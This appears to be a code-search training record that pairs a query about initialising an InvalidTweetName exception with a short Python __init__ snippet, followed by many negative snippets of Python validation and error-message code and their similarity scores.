raise ValidationException(\"Message cannont be empty.\")", "def testConstructorNotAField(self):\n class SomeMessage(messages.Message):\n pass\n\n self.assertRaisesWithRegexpMatch(\n AttributeError,\n ('May not assign arbitrary value does_not_exist to message '\n 'SomeMessage'),\n SomeMessage,\n does_not_exist=10)", "def testValidate_Optional(self):\n class SimpleMessage(messages.Message):\n non_required = messages.IntegerField(1)\n\n simple_message = SimpleMessage()\n simple_message.check_initialized()\n simple_message.non_required = 10\n simple_message.check_initialized()", "def error_message(self, error_field=None, **kwargs):\n\n if error_field:\n return \"Validation failed in LogicalConnector \\\"{}\\\" on field \\\"{}\\\"\".format(self.__class__.__name__, error_field)\n return \"Validation failed in LogicalConnector \\\"{}\\\"\".format(self.__class__.__name__)", "def testMessageField(self):\n self.assertRaises(messages.FieldDefinitionError,\n messages.MessageField,\n str,\n 10)\n\n self.assertRaises(messages.FieldDefinitionError,\n messages.MessageField,\n messages.Message,\n 10)\n\n class MyMessage(messages.Message):\n pass\n\n field = messages.MessageField(MyMessage, 10)\n self.assertEquals(MyMessage, field.type)", "def test_raises_on_constructor_fields_error(self):\n self.form.constructor_fields = None\n message = \"Expected a list of field name strings for constructor_fields. \"\n with self.assertRaisesMessage(ImproperlyConfigured, message):\n self.form.confirm_required_fields()", "def error_message(self, error_message: str):\n\n self._error_message = error_message", "def test_value_init7(self):\n with self.assertRaises(ValueError) as err:\n r1 = Rectangle(-4, 5)\n msg = \"width must be > 0\"\n self.assertEqual(str(err.exception), msg)", "def __init__(self):\n\n # dictionary that link all the invalid equation code to the\n # corresponding error massage\n self.ERROR_MASSAGE_DIC = {\n InvalidEquationCode.VALID: \"Valid\",\n InvalidEquationCode.UNDEFINED_CHARACTERS:\n \"Undefined characters in your equation\",\n InvalidEquationCode.CLOSE_WITHOUT_OPEN_BRACKET:\n \"Close bracket without open one\",\n InvalidEquationCode.EMPTY_EQUATION:\n \"Empty equation\",\n InvalidEquationCode.TOO_MANY_OPEN_BRACKET:\n \"Too many open brackets...(missing close brackets)\",\n InvalidEquationCode.OPERATORS_OPERANDS_ERROR:\n \"Missing operators/operands..\",\n InvalidEquationCode.TOO_MANY_DOTS:\n \"Too many dots in one number\",\n InvalidEquationCode.UNNECESSARY_BRACKET:\n \"Unnecessary brackets in your equation\",\n InvalidEquationCode.DIVISION_BY_ZERO:\n \"Division by zero is undefined\",\n InvalidEquationCode.FACTORIAL_ON_NEGATIVE_NUMBER:\n \"Factorial on negative number is illegal\",\n InvalidEquationCode.FACTORIAL_ON_DECIMAL_NUMBER:\n \"Factorial on negative number is illegal\",\n InvalidEquationCode.NUMBER_TOO_BIG: \"Number is too big\",\n InvalidEquationCode.COMPLEX_NUMBER: \"Complex number\",\n InvalidEquationCode.EMPTY_DECIMAL_POINT:\n \"Empty decimal point....(missing number)\",\n }", "def test_validate_password_length_without_default_value(self):\n for _ in range(3):\n with self.assertRaises(ValidationError):\n test_password = os.urandom(random.randint(0, self.min_password_length - 1)).decode('latin1')\n validate_password_length(test_password)\n try:\n for _ in range(3):\n test_password = os.urandom(random.randint(self.min_password_length, 30)).decode('latin1')\n validate_password_length(test_password)\n except ValidationError:\n self.fail('ValidationError must not have been raised')", "def validate_fields(cls, message_type: str, attachment_data: dict) -> None:", "def validate_password_length(value):\r\n message = _(\"Invalid Length ({0})\")\r\n code = \"length\"\r\n\r\n min_length = getattr(settings, 'PASSWORD_MIN_LENGTH', None)\r\n max_length = getattr(settings, 'PASSWORD_MAX_LENGTH', None)\r\n\r\n if min_length and len(value) < min_length:\r\n raise ValidationError(message.format(_(\"must be {0} characters or more\").format(min_length)), code=code)\r\n elif max_length and len(value) > max_length:\r\n raise ValidationError(message.format(_(\"must be {0} characters or less\").format(max_length)), code=code)", "def on_init_fail(self, event_time, message):\n pass", "def length_changed(self, value):\n self.message.dlc = value\n self.validate_data_input(value)", "def validate(self):\n\tif self.is_new():\n\t\treturn\n\n\tself.get_columns_from_db()\n\n\tcolumns = [frappe._dict({\"fieldname\": f, \"fieldtype\": \"Data\"}) for f in standard_varchar_columns]\n\tcolumns += self.columns.values()\n\n\tfor col in columns:\n\t\tif len(col.fieldname) >= 64:\n\t\t\tfrappe.throw(f\"Fieldname is limited to 64 characters ({frappe.bold(col.fieldname)})\")\n\n\t\tif col.fieldtype in type_map and type_map[col.fieldtype][0]==\"varchar\":\n\n\t\t\t# validate length range\n\t\t\tnew_length = cint(col.length) or cint(varchar_len)\n\t\t\tif not (1 <= new_length <= 1000):\n\t\t\t\tfrappe.throw(f\"Length of {col.fieldname} should be between 1 and 1000\")\n\n\t\t\tif not frappe.local.conf.reduce_varchar_on_migration:\n\t\t\t\tcontinue\n\n\t\t\tcurrent_col = self.current_columns.get(col.fieldname, {})\n\t\t\tif not current_col:\n\t\t\t\tcontinue\n\t\t\tcurrent_type = self.current_columns[col.fieldname][\"type\"]\n\t\t\tcurrent_length = re.findall('varchar\\(([\\d]+)\\)', current_type)\n\t\t\tif not current_length:\n\t\t\t\t# case when the field is no longer a varchar\n\t\t\t\tcontinue\n\t\t\tcurrent_length = current_length[0]\n\t\t\tif cint(current_length) > cint(new_length):\n\t\t\t\ttry:\n\t\t\t\t\t# check for truncation\n\t\t\t\t\tmax_length = frappe.db.sql(\"\"\"select max(char_length(`{fieldname}`)) from `tab{doctype}`\"\"\"\\\n\t\t\t\t\t\t.format(fieldname=col.fieldname, doctype=self.doctype))\n\n\t\t\t\texcept (InternalError, OperationalError) as e:\n\t\t\t\t\tif e.args[0] == ER.BAD_FIELD_ERROR:\n\t\t\t\t\t\t# Unknown column 'column_name' in 'field list'\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\telse:\n\t\t\t\t\t\traise\n\n\t\t\t\tif max_length and max_length[0][0] and max_length[0][0] > new_length:\n\t\t\t\t\tif col.fieldname in self.columns:\n\t\t\t\t\t\tself.columns[col.fieldname].length = current_length\n\n\t\t\t\t\tfrappe.msgprint(f\"\"\"\n\t\t\t\t\t\tReverting length to {current_length}\n\t\t\t\t\t\tfor '{col.fieldname}' in '{self.doctype}';\n\t\t\t\t\t\tSetting the length as {new_length} will cause truncation of data.\n\t\t\t\t\t\"\"\")", "def __init__(self, _client=None, minimum_length=None):\n\n super().__init__(_client=_client)\n\n # inline imports for avoiding circular references and bulk imports\n\n # fields\n self._minimum_length = fields.IntegerField(value=minimum_length)", "def error(self, message):\r\n self._construct_partial_parser().error(message)", "def test_length(self):\n form_data = self.form_data('c897B$eH@')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def validate_frame_length(frame_length, algorithm):\n if frame_length < 0 or frame_length % algorithm.encryption_algorithm.block_size != 0:\n raise SerializationError(\n \"Frame size must be a non-negative multiple of the block size of the crypto algorithm: {block_size}\".format(\n block_size=algorithm.encryption_algorithm.block_size\n )\n )\n if frame_length > aws_encryption_sdk.internal.defaults.MAX_FRAME_SIZE:\n raise SerializationError(\n \"Frame size too large: {frame} > {max}\".format(\n frame=frame_length, max=aws_encryption_sdk.internal.defaults.MAX_FRAME_SIZE\n )\n )", "def error_message(self, error_message):\n\n self._error_message = error_message", "def test_check_map_var_len_not_specified(self):\r\n\r\n self.assertRaises(ValueError, check_map,\r\n self.valid_mapping_data_var_len_bcs)", "def test_init_valid_field(self):\n fields = {'Conn Note': {'offset': 0,\n 'length': 20}}\n parser = top.Parser(fields=fields)\n received = parser.get_fields()\n expected = fields\n msg = 'Fields initialisation property setter/getter error.'\n self.assertEqual(received, expected, msg)", "def add_error(self, request, message):\n\n ParameterErrorMessage(request, self, message)", "def __init__(self, message=None):\n if message is not None:\n super(CryptoritoError, self).__init__(message)\n else:\n super(CryptoritoError, self).__init__()", "def error_message(self, error_message):\n # type: (string_types) -> None\n\n if error_message is not None:\n if not isinstance(error_message, string_types):\n raise TypeError(\"Invalid type for `error_message`, type has to be `string_types`\")\n\n self._error_message = error_message", "def __init__(self,value,message):\n ValueError.__init__(self,value,message)", "def mobile_len_validator(mobile):\n if len(mobile) != 13:\n raise ValidationError('Invalid mobile len')", "def test_that_field_required_validations_are_triggered_on_incorrect_attribute_setting(\n self,\n ):\n person = Person(first_name=\"Johnny\", last_name=\"John\")\n\n with pytest.raises(ValidationError) as error:\n person.first_name = \"\" # Simulate an error by force-resetting an attribute\n\n assert error.value.messages == {\"first_name\": [\"is required\"]}", "def testOffsetBadLength(self):\n def setOffset():\n self.cc.offset = ['banana']\n\n self.assertRaises(\n ValueError,\n setOffset\n )", "def __init__(self, size):\n self.handle_errors(size)\n self.__size = size", "def __init__(self, error_msg):\n super(ConnectionException, self).__init__(error_msg)", "def test_badsizevaluewithstring(self):\n Rectangle.reset_objects()\n with self.assertRaises(TypeError) as e:\n r1 = Square(\"foo\", 1, 2, 3)\n self.assertEqual(str(e.exception), 'width must be an integer')", "def test_init_with_invalid_body(self):\n body = {'foo': 2}\n with pytest.raises(ValueError) as excinfo:\n SQSMessage(self.schema, body=body)\n\n assert \"{'event_name': 'Required'}\" in str(excinfo.value)\n\n body = {'event_name': 2}\n with pytest.raises(ValueError) as excinfo:\n SQSMessage(self.schema, body=body)\n\n assert 'String does not match expected pattern' in str(excinfo.value)\n\n body = {'event_name': 'job.'}\n with pytest.raises(ValueError) as excinfo:\n SQSMessage(self.schema, body=body)\n\n assert 'String does not match expected pattern' in str(excinfo.value)", "def __init__(__self__, *,\n message: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input['DataSourceErrorInfoType']] = None):\n if message is not None:\n pulumi.set(__self__, \"message\", message)\n if type is not None:\n pulumi.set(__self__, \"type\", type)", "def testMessageFieldValidate(self):\n class MyMessage(messages.Message):\n pass\n\n class AnotherMessage(messages.Message):\n pass\n\n field = messages.MessageField(MyMessage, 10)\n field.validate(MyMessage())\n\n self.assertRaises(messages.ValidationError,\n field.validate,\n AnotherMessage())", "def __init__(self, max_size=5):\n if max_size<0: \n raise ValueError \n\n self.max_size = max_size \n super().__init__()", "def __init__(self, domain, field, **options):\n\n super().__init__(domain, field, **options)\n\n if not callable(self.accepted_minimum_provider) and \\\n not callable(self.accepted_maximum_provider) and \\\n self.accepted_minimum is not None and self.accepted_maximum is not None \\\n and self.accepted_minimum > self.accepted_maximum:\n raise MinimumValueLargerThanMaximumValueError('Accepted minimum value for '\n 'validator [{name}] could not be '\n 'larger than accepted maximum value.'\n .format(name=self))\n\n self._validate_exception_type(self.range_value_error)", "def set_length(self, length):\n if length < 0:\n raise AttributeError('length should be positive')\n self.progress_char_length = length", "def testOffsetBadLength(self):\n def setOffset():\n self.node.offset = ['banana']\n\n self.assertRaises(\n ValueError,\n setOffset\n )", "def set_length(self, new_length):\n if(new_length == None):\n self._logger.write(\"Error! new_length cannot be a NoneType\")\n elif(type(new_length) != float):\n self._logger.write(\"Error! new_length must be of type float\")\n else:\n try:\n self._length = new_length\n except Exception as e:\n self._logger.write(\"Error! Could not set the new length:\\n %s\" % e)", "def test_length_unknown_unit(self):\n with self.assertRaises(ValueError):\n METRIC_SYSTEM.length(5, 'fr')" ]
[ "0.6513797", "0.6197296", "0.61887497", "0.6181867", "0.61449176", "0.60927874", "0.60907245", "0.6026868", "0.6024588", "0.59886456", "0.59638536", "0.5922339", "0.5841489", "0.5829803", "0.5813546", "0.57707214", "0.570892", "0.570892", "0.5679656", "0.5664138", "0.5654813", "0.56524014", "0.56334627", "0.5622623", "0.5596413", "0.55902493", "0.554929", "0.5548877", "0.55393445", "0.5529387", "0.55003005", "0.54902375", "0.5476536", "0.54677033", "0.5457934", "0.54550767", "0.54450285", "0.5428507", "0.54178184", "0.5395846", "0.5388124", "0.53854465", "0.53816617", "0.53629804", "0.5351477", "0.5349587", "0.53401124", "0.53359866", "0.53036505", "0.5302663", "0.5299554", "0.52995193", "0.5291401", "0.5277605", "0.52763844", "0.5275263", "0.52752453", "0.52576876", "0.5251381", "0.52499425", "0.5241349", "0.523736", "0.5231825", "0.52298415", "0.5212143", "0.5201551", "0.52009434", "0.5199836", "0.518912", "0.51809627", "0.5178487", "0.51700985", "0.5168601", "0.516497", "0.51556504", "0.51553434", "0.51520413", "0.514857", "0.51452214", "0.51375055", "0.51340204", "0.5118383", "0.5116371", "0.51086116", "0.5107803", "0.50882244", "0.50783604", "0.5077081", "0.50736004", "0.5062855", "0.50587314", "0.5049467", "0.5041273", "0.503964", "0.5033142", "0.50244176", "0.5019676", "0.5018494", "0.50172406", "0.5014535", "0.50071126" ]
0.0
-1
Initializes InvalidTweetName with an error message.
def __init__(self, msg): self.msg = msg
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, data_file_name: str, message: str) -> None:\n\n super().__init__(\n \"Invalid data error. \"\n \"The file '{}' contained data of the wrong format: {}\".format(\n data_file_name, message\n )\n )", "def test_fails_on_no_name(self):\n invalid_credentials_no_name_twine = \"\"\"\n {\n \"credentials\": [\n {\n \"purpose\": \"credentials without a name should be invalid\"\n }\n ]\n }\n \"\"\"\n\n with self.assertRaises(exceptions.InvalidTwine):\n Twine(source=invalid_credentials_no_name_twine)", "def __init__(self, username: str) -> None:\n try:\n check_string(username, 'username', 'a-z0-9', 100)\n except IllegalParameterError as e:\n raise IllegalUsernameError(e.message) from e\n self.name = username", "def name_error(name):\n\n if len(name) > MAX_NAME_LENGHT:\n raise InputError(description=\"Name cannot be more than 20 characters long\")", "def __init__(self, message, code, *args):\n self.message = message\n self.code = code\n super(TwitterException, self).__init__(message, code, *args)", "def __init__(self, error_msg):\n super(SdkException, self).__init__()\n self.error_msg = error_msg", "def get_name_validation_error(name):\n return '' if name else accounts.REQUIRED_FIELD_NAME_MSG", "def error_message(self, error_message: str):\n\n self._error_message = error_message", "def __init__(self,data_name):\n\t\tif data_name.lower().strip() not in DATASETS.keys():\n\t\t\tprint(f\"{data_name} isn't a valid data name! One of \"+\", \".join(DATASETS.keys()))\n\t\t\traise Exception\n\n\t\tself.data_name = data_name.lower().strip()", "def __init__(self, message=None):\n if message is None:\n message = \"Game error!\"\n self.__message = message", "def __init__(self, name):\n super(NodeExistsError, self).__init__(name)\n self.name = name", "def username_error(self, msg):\n raise NotImplementedError('username_error')", "def __init__(self, base):\n if isinstance(base, str):\n self._name = base\n else:\n raise TypeError(NAME_CREATE_ERROR)", "def _load_from_text(self, text):\n self.code = \"Error\"\n self.message = text", "def __init__(self, message=\"\"):\n super(ValidationError, self).__init__(message)", "def __init__(self, message=\"\"):\n super(ApplicationError, self).__init__(message)", "def error_message(self, error_message):\n\n self._error_message = error_message", "def __init__(self, message: str) -> None:\n\n super().__init__(\n \"Data requested from a class could not be found: {}\".format(message)\n )", "def __init__(self, message=\"\"):\n super(DataError, self).__init__(message)", "def name(self, the_name):\n if (len(the_name) < TempDataset.MIN_LEN\n or len(the_name) > TempDataset.MAX_LEN):\n raise ValueError\n self._name = the_name", "def __init__(self, message_id: str, error_code: str):\n super().__init__(f\"Command failed: {error_code}\")\n self.message_id = message_id\n self.error_code = error_code", "def on_init_fail(self, event_time, message):\n pass", "def testUnknownName(self):\n exc = self.assertRaises(\n ValueError,\n self.client.status,\n \"ignored\", \"IMPOSSIBLE?!\",\n )\n self.assertEqual(str(exc),\n \"Unknown names: \" + repr(set([\"IMPOSSIBLE?!\"])))", "def tweet_invalid(self):\r\n\r\n valid = True # optimism\r\n validation_error = None\r\n\r\n if not self.tweet_length():\r\n valid, validation_error = False, 'Empty text'\r\n\r\n if self.tweet_length() > MAX_LENGTH:\r\n valid, validation_error = False, 'Too long'\r\n\r\n if re.search(ur''.join(REGEXEN['invalid_control_characters']), self.text):\r\n valid, validation_error = False, 'Invalid characters'\r\n \r\n if self.parent and hasattr(self.parent, 'tweet_is_valid'):\r\n self.parent.tweet_is_valid = valid\r\n if self.parent and hasattr(self.parent, 'tweet_validation_error'):\r\n self.parent.tweet_validation_error = validation_error\r\n\r\n return validation_error if not valid else False", "def __init__(self):\n self.message = \"No task found with the given string.\"", "def __init__(self, exception, message=\"Invalid requests parse!\"):\n self.message = message\n self.exception = exception\n super().__init__(self.message)", "def __init__(self, error_type: str):\n self.message = ''\n\n if error_type == 'length':\n self.message = 'Password must be between 6 and 100 characters long'\n\n elif error_type == 'one_lower':\n self.message = 'Password must contain at least one lowercase letter'\n\n elif error_type == 'one_upper':\n self.message = 'Password must contain at least one uppercase letter'\n\n elif error_type == 'one_digit':\n self.message = 'Password must contain at least one number'\n\n logging.error(str(self))\n super().__init__(self.message)", "def test_bad_name(self):\n\n request = service.get_request('GET', {u'taxon': u'Nosuchtaxonia'})\n x = self.start_request_tests(request)\n m = x.json().get(u'message')\n self.assertTrue(x.status_code >= 200)\n self.assertTrue('No Taxon matched\" in \"%s\"' % m)", "def test_fails_on_lowercase_name(self):\n invalid_credentials_lowercase_name_twine = \"\"\"\n {\n \"credentials\": [\n {\n \"name\": \"my_secrets_should_be_uppercase\",\n \"purpose\": \"Token for accessing a 3rd party API service\"\n }\n ]\n }\n \"\"\"\n\n with self.assertRaises(exceptions.InvalidTwine):\n Twine(source=invalid_credentials_lowercase_name_twine)", "def error_message(self, error_message):\n # type: (string_types) -> None\n\n if error_message is not None:\n if not isinstance(error_message, string_types):\n raise TypeError(\"Invalid type for `error_message`, type has to be `string_types`\")\n\n self._error_message = error_message", "def test_name_missing(self) -> None:\n with pytest.raises(NotFound):\n ObservationType.from_name('Missing ObservationType Name')", "def test_fails_on_name_whitespace(self):\n invalid_credentials_space_in_name_twine = \"\"\"\n {\n \"credentials\": [\n {\n \"name\": \"MY NAME SHOULD NOT HAVE WHITESPACE\",\n \"purpose\": \"Token for accessing a 3rd party API service\"\n }\n ]\n }\n \"\"\"\n\n with self.assertRaises(exceptions.InvalidTwine):\n Twine(source=invalid_credentials_space_in_name_twine)", "def username_error(self, msg):\n print('\\nusername error: %s' % msg, file=self.console)\n self.username = input('Username: ')", "def __init__(self, message=None):\n if message is not None:\n super(CryptoritoError, self).__init__(message)\n else:\n super(CryptoritoError, self).__init__()", "def __init__(self, msg):\n super(F5CcclSchemaError, self).__init__(msg)\n self.msg = 'Schema provided is invalid: ' + msg", "def __init__(self, message):\n self.message = LicenseError.ERROR + message\n\n super(LicenseError, self).__init__(self.message)", "def set_error(self, name, value):\n self.errors[name] = value", "def name(self, name) :\n\t\ttry :\n\t\t\tself._name = name\n\t\texcept Exception as e:\n\t\t\traise e", "def __init__(self, name: str) -> None:\n self._name = name", "def error(self, message, token=None):\n raise ParseException(\n message,\n self.filename,\n line=self._line,\n line_number=self._line_number,\n token=token)", "def __init__(self, msg):\n\n super(HTTPError, self).__init__(msg)\n self.msg = msg", "def __init__(self, name, f):\r\n self.FailedIds = []\r\n self.Name = name\r\n self.F = f", "def __init__(self):\n self.message = \"Invalid time zone string, choose one from https://stackoverflow.com/questions/13866926/is-there-a-list-of-pytz-timezones.\"", "def test_place_name_exception(self):\n with pytest.raises(Exception):\n assert self.test_exception() != \"Mogn\"", "def validate_username(self, username):\n user = User.query.filter_by(username=username.data).first()\n if user:\n # if user is not None\n raise ValidationError('That username is taken. Please choose a different one.')", "def __init__(self, msg: str, definition: Optional[ErrorDef] = None) -> None:\n if definition is None:\n definition = CommonErrorDef.INTERNAL_SERVER_ERROR\n\n super().__init__(definition=definition, error=msg)", "def test_init_with_invalid_body(self):\n body = {'foo': 2}\n with pytest.raises(ValueError) as excinfo:\n SQSMessage(self.schema, body=body)\n\n assert \"{'event_name': 'Required'}\" in str(excinfo.value)\n\n body = {'event_name': 2}\n with pytest.raises(ValueError) as excinfo:\n SQSMessage(self.schema, body=body)\n\n assert 'String does not match expected pattern' in str(excinfo.value)\n\n body = {'event_name': 'job.'}\n with pytest.raises(ValueError) as excinfo:\n SQSMessage(self.schema, body=body)\n\n assert 'String does not match expected pattern' in str(excinfo.value)", "def raiseNameError(text):\n pattern = re.compile(\"[a-zA-Z]\")\n if not pattern.match(text):\n raise Exception(\"Invalid Name Entered\")", "def _check_name(self):\n\t\tpass", "def __init__(\n self,\n _email_address=None,\n _name=None,\n _otherinfo=\"\",\n _extrainfo=\"\",\n **kwargs\n ):\n self.email_address = _email_address\n self.name = _name\n self.otherinfo = _otherinfo\n self.extrainfo = _extrainfo\n self.misc = kwargs.items()\n\n self.validate()", "def __init__(self, msg='Can\\'t find ticker of this brand name.'):\n super().__init__(msg)", "def error_name(self) -> str:\n return self._error_name", "def __init__(self, message, text=None, reference=None, contact=None):\n self.openid_message = message\n self.reference = reference\n self.contact = contact\n assert type(message) not in [str, str]\n Exception.__init__(self, text)", "def __init__(self, from_email):\n self.code = 400\n self.from_email = from_email\n Error.__init__(self)", "def __init__(self, name):\n self._name = name\n pass", "def __init__(self, msg=\"\"\"Google can\\'t find enough news data for this query: Invalid query\"\"\"):\n super().__init__(msg)", "def __init__(self):\n self.message = \"No stop found with the given string.\"", "def __init__(self, first_name, second_name, age, location):\n self.name = f'{first_name.title()} {second_name.title()}'\n self.age = age\n self.location = location\n self.login_attempts = 0", "def __init__(self, obj):\n super().__init__(\"File {} doesn't exist or invalid.\".format(obj))", "def __init__(self, name: Optional[str] = None):\n self.name = name", "def __init__(self, msg):\n\n super(DBValueError, self).__init__(msg)\n self.msg = msg", "def _init_company_name(cls, company_name: str = None) -> str:\n if company_name and isinstance(company_name, str):\n return company_name\n if company_name:\n return TypeError(\"company_name kwarg should be an instance of str\")\n return FAKE.format('company')", "def validate_username(self, username):\n user = User.query.filter_by(username=username.data).first()\n if user:\n raise ValidationError('That username already exists. Please choose another username.')", "def __init__(self, error_msg):\n super(RequestTimeoutException, self).__init__(error_msg)", "def __init__(self, name):\n self._name = name", "def __init__(self, name):\n self._name = name", "def _init(self, **kwds):\n name = kwds.get('name')\n if name and not self.data.has_key('name'):\n self.set_name(name)\n self.characterID = kwds.get('characterID', None)\n self.myName = kwds.get('myName', u'')", "def test_username_not_unique(bot):\n expect_error(register, InputError, bot.username, \"abcdef\", \"a\", \"a\", \"a\")", "def __init__(self, error_msg):\n super(ConnectionException, self).__init__(error_msg)", "def __init__(self, msg):\n\n super(ConfigError, self).__init__(msg)\n self.msg = msg", "def nameIsValid(self, name):\n self.notify.debug('nameIsValid')\n if (name in self.usedNames):\n return OTPLocalizer.ToonAlreadyExists % (name)\n\n problem = NameCheck.checkName(name, font=self.nameEntry.getFont())\n if problem:\n return problem\n\n # name has passed local checks\n return None", "def __init__(self, error_num, args, msg):\n\n self.error_num = error_num\n self.args = args\n self.message = msg", "def test_constructor_with_wrong_folder_name_should_raise_exception(self):\n with self.assertRaises(UploaderException) as cm:\n GDriveUploader(None, 'my_wrong_folder_name!')\n\n self.assertEqual(\n UploaderException.INVALID_DIR_NAME,\n cm.exception.code\n )", "def test_unknown_names_raise_exception(self):\r\n tm = TestModel.create(count=8, text='123456789')\r\n with self.assertRaises(TypeError):\r\n tm.update(jon='beard')", "def set_name(self,name):\n if not isinstance(name,(str)):\n raise TypeError('name must be string')\n else:\n self._name = name", "def __init__(self, message, repl):\n super(LinterFailure, self).__init__()\n self.message = message\n self.replacement = repl", "def __init__(self, error_code: int, message: str):\r\n self.error_code: int = error_code\r\n self.message: str = message\r\n super(ImageUnaccesible, self).__init__(self.error_code,\r\n f'{self.error_code} ---> \\\r\n {self.message}')", "def get_username_validation_error(username):\n return _validate(_validate_username, errors.AccountUsernameInvalid, username)", "def __init__(self, error_message: str=None, error_code: int=None): # noqa: E501\n self.swagger_types = {\n 'error_message': str,\n 'error_code': int\n }\n\n self.attribute_map = {\n 'error_message': 'error_message',\n 'error_code': 'error_code'\n }\n\n self._error_message = error_message\n self._error_code = error_code", "def __init__(self, name, pattern_factory):\n\t\tsuper(AlreadyRegisteredError, self).__init__(name, pattern_factory)", "def test_create_task_given_name_already_exists_error(self):\n rv = TEST_CLIENT.post(TASK_ROUTE, json={\"name\": util.MOCK_TASK_NAME_1})\n result = rv.json()\n\n expected = {\n \"message\": \"a task with that name already exists\",\n \"code\": \"TaskNameExists\",\n }\n self.assertDictEqual(expected, result)\n self.assertEqual(rv.status_code, 400)", "def __init__(self, error_search=\"error\"):\n self.error_search = error_search", "def __init__(self, message):\n logging.error(\"ERROR: {0}\".format(message))\n logging.error(\"Try running with --help for more information.\")", "def __init__(self, name = None):\n self._name = name", "def test_MissedName(self):\n\t\n\t\tdashboardPage = DashboardPage(self.driver)\n\t\tdashboardPage.goToOnboard()\n\t\tdashboardPage.createCustomer(\"\", S3FOLDER)\n\n\t\terr1, err2 = dashboardPage.getErrorsNoName()\n\t\tself.assertEqual(err1.text, ERR_MSG1)\n\t\tself.assertEqual(err2.text, ERR_MSG2)", "def __init__(self, f_name, l_name, age, birthplace):\n self.f_name = f_name\n self.l_name = l_name\n self.age = age\n self.birthplace = birthplace\n self.login_attempts = 0", "def testBadNames(self):\n bad_dataset = self.badstr\n bad_table = self.badstr * 2\n # Ignore access to protected members\n # pylint: disable=W0212\n\n self.assertRaises(DOLAPI._DOLAPIError,\n self.auth.table,\n bad_dataset,\n self.table)\n\n self.assertRaises(DOLAPI._DOLAPIError,\n self.auth.table,\n self.dataset,\n bad_table)\n\n self.assertRaises(DOLAPI._DOLAPIError,\n self.auth.table,\n bad_dataset,\n bad_table)", "def __init__(__self__, *,\n name: Optional[pulumi.Input[str]] = None):\n if name is not None:\n pulumi.set(__self__, \"name\", name)", "def __init__(__self__, *,\n name: Optional[pulumi.Input[str]] = None):\n if name is not None:\n pulumi.set(__self__, \"name\", name)", "def __init__(__self__, *,\n name: Optional[pulumi.Input[str]] = None):\n if name is not None:\n pulumi.set(__self__, \"name\", name)", "def __init__(__self__, *,\n name: Optional[pulumi.Input[str]] = None):\n if name is not None:\n pulumi.set(__self__, \"name\", name)", "def __init__(__self__, *,\n name: Optional[pulumi.Input[str]] = None):\n if name is not None:\n pulumi.set(__self__, \"name\", name)", "def __init__(__self__, *,\n name: Optional[pulumi.Input[str]] = None):\n if name is not None:\n pulumi.set(__self__, \"name\", name)", "def __init__(self, name: str):\n self.name = name", "def setErrorMessage(self, errorMessage):\n self._errorMessage = errorMessage", "def __init__(__self__, *,\n error_code: pulumi.Input[Union[str, 'CopyCompletionErrorReason']],\n error_message: pulumi.Input[str]):\n pulumi.set(__self__, \"error_code\", error_code)\n pulumi.set(__self__, \"error_message\", error_message)", "def test_bad_names(self):\n self.do_test_bad_name('', 'tmp/frog')\n self.do_test_bad_name('.b', 'tmp/frog')\n self.do_test_bad_name('a b', 'tmp/frog') # FAILS\n self.do_test_bad_name('a-b', 'tmp/frog') # FAILS", "def _syntax_error(msg):\n try:\n filename = stream.name\n except AttributeError:\n filename = None\n return RFC822SyntaxError(filename, lineno, msg)", "def _raise_format_error(self, name: str, format_str: str, source_format: str):\n\n raise ValueError(f\"The '{ name }' should be { format_str }, rather than { source_format }\")", "def __init__(self, source, category, name, message, **kwargs):\n super().__init__(source, category, name, message, **kwargs)\n if \"exception\" not in kwargs:\n self._parse_traceback()", "def check_name(self, name, bots_path):\n if not os.path.exists(bots_path + name):\n raise ValueError(\"Could not find bot '{bot}'\".format(bot=bots_path + name))\n else:\n self.name = name\n self.path = bots_path + name + os.sep" ]
[ "0.6010401", "0.5765059", "0.54735583", "0.544012", "0.54245514", "0.54195553", "0.5391037", "0.5378705", "0.53236824", "0.53205895", "0.5272788", "0.52640235", "0.524458", "0.52370137", "0.5229564", "0.5201824", "0.5157976", "0.51524526", "0.51459634", "0.51440966", "0.5142513", "0.5109591", "0.5108444", "0.51044416", "0.5102282", "0.51000834", "0.5099943", "0.504855", "0.5032683", "0.5029346", "0.5022238", "0.5018278", "0.49908465", "0.49883562", "0.49794406", "0.49749535", "0.49532777", "0.49400982", "0.49396795", "0.4927477", "0.49229425", "0.49214262", "0.49188697", "0.49075252", "0.4904022", "0.4901415", "0.48745087", "0.4865619", "0.4864891", "0.48586193", "0.4850401", "0.48489898", "0.48476338", "0.4827589", "0.48265338", "0.48203704", "0.48125485", "0.4806988", "0.4806873", "0.47914013", "0.47867832", "0.47778952", "0.47671413", "0.47601417", "0.47597983", "0.47597983", "0.47507536", "0.47453856", "0.47445342", "0.47407794", "0.4739168", "0.47380134", "0.47375387", "0.4731605", "0.47301263", "0.4724325", "0.47221908", "0.47200483", "0.47186074", "0.47177687", "0.47163135", "0.4712953", "0.47106057", "0.47084835", "0.47068122", "0.47042897", "0.4704128", "0.4701961", "0.4701961", "0.4701961", "0.4701961", "0.4701961", "0.4701961", "0.46983272", "0.46977568", "0.46881557", "0.46827653", "0.4680754", "0.4678685", "0.46756208", "0.4675543" ]
0.0
-1
Initializes InvalidUsername with an error message.
def __init__(self, msg): self.msg = msg
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, username: str) -> None:\n try:\n check_string(username, 'username', 'a-z0-9', 100)\n except IllegalParameterError as e:\n raise IllegalUsernameError(e.message) from e\n self.name = username", "def username_error(self, msg):\n raise NotImplementedError('username_error')", "def get_username_validation_error(username):\n return _validate(_validate_username, errors.AccountUsernameInvalid, username)", "def username_error(self, msg):\n print('\\nusername error: %s' % msg, file=self.console)\n self.username = input('Username: ')", "def validate_username(self, username):\n user = User.query.filter_by(username=username.data).first()\n if user:\n # if user is not None\n raise ValidationError('That username is taken. Please choose a different one.')", "def test_empty_username():\n expect_error(register, InputError, \"\", \"abcdef\", \"A\", \"A\", \"A\")", "def validate_username(self, username):\n user = User.query.filter_by(username=username.data).first()\n if user:\n raise ValidationError('That username already exists. Please choose another username.')", "def username(self, username) :\n\t\ttry :\n\t\t\tself._username = username\n\t\texcept Exception as e:\n\t\t\traise e", "def validate_username(self, username):\n if username.data != current_user.username:\n user = User.query.filter_by(username=username.data).first()\n if user:\n raise ValidationError('That username already exists. Please choose another username.')", "def test_username_not_unique(bot):\n 